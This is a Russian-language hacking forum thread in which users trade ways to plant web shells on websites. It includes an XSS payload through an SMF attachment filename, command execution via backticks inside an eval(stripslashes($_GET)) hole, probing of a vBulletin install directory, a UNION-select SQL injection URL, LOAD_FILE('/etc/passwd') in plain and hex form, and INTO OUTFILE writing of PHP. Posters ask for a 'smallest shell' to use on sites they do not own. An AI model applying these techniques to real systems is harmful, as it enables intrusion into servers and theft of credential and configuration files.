В теме Уязвимости SMF (во втором сообщении) XSS Отсутствует фильтрация atachment filename ------------------------- Получение web shell'a нужно создать сообщение и прикрепить файл с именем "name<img src=...." и загружается .js скрипт ------- Этот скрипт изменять надо или шел появится сразу как я напишу сообщение ?
есть такая конструкция в скрипте PHP: eval(stripslashes($_GET['var'])); проблема: при запросе фильтруется использование сразу двух скобок, " и \ каким метод получиться залить шелл, если вообще получится?
стрипслэш не фильтрует ковычки ` а если сделать такой запрос: echo с такими ковычками, то получится тоже самое что и system() пример: ещё пример: === 2geforse шелл загрузится если админ попадёт на страницу с правильно сформатированным запросом, если я прально понял о чём ты
echo с такими ковычками, то получится тоже самое что и system() вернее это то же самое что shell_exec()
есть форум vBulletin Version 3.6.3, если ввести forum.site.ru/install/, то вылезает ошибка 500 Internal Server Error ------ ввожу forum.site.ru/installllllll/, вылезает 404 Not Found ---------------------------- тоесть папка install существует ?
2geforse Ты таки прав она есть попробуй указать сразу путь к файлу установки forum.site.ru/install/install.php
Не кто случаем не подскажет где можно прочитать про методы реализации атак на Повреждение памяти апапча ?
Простите за глупый вопрос, как нужно заливать шелл,когда у меня есть: 1)root-права 2)c://www/www/index.php (знаю путь) 3)ну естественно File_priv=Y Как?.LOAD_FILE (можно посмотреть конфиги ,но не робит ,)но что-то не получаеться Или как узнать префикс? (там самописный сайт,локалка) =\
http://10.49.165.241/joke/index.php?sbcat_id=-34+union+select+1,2,3,4,5,6,7,8,9,10+from+mysql.user-- вот... как залить шелл? Сменя +8.
Уязвимость ли это? Как "Это" можно применить? Fatal error: Uncaught exception 'Zend_Controller_Dispatcher_Exception' with message 'Invalid controller specified (vceos)' in /usr/local/www/***.by_new/library/Zend/Controller/Dispatcher/Standard.php:249 Stack trace: #0 /usr/local/www/***.by_new/library/Zend/Controller/Front.php(914): Zend_Controller_Dispatcher_Standard->dispatch(Object(Zend_Controller_Request_Http), Object(Zend_Controller_Response_Http)) #1 /usr/local/www/***.by_new/htdocs/index.php(81): Zend_Controller_Front->dispatch() #2 {main} thrown in /usr/local/www/***.by_new/library/Zend/Controller/Dispatcher/Standard.php on line 249
DDoSька Если речь идёт о заливке через инъекцию, то необходимо, что-бы ковычки не фильтровались. Если ты не можешь прочитать файл так: LOAD_FILE('/etc/passwd') А можешь так : LOAD_FILE(0x2f6574632f706173737764) то скорее всего magic_quotes_gpc = on, и через INTO OUTFILE залить не получится. PS Для любителей докопаться: Я видел что винда, /etc/passwd для примера
Фишка в том,что отклюбчен удаленный инклуд, Warning: include() [function.include]: URL file-access is disabled in the server configuration оцтой =\ Хотя если через бд выполнять не include.... а <? echo "lol"; ?> into.... то файл создаеться и все выполняеться,ДАЙТЕ самый маленький шелл плиз)) дайте самый маленький шелл))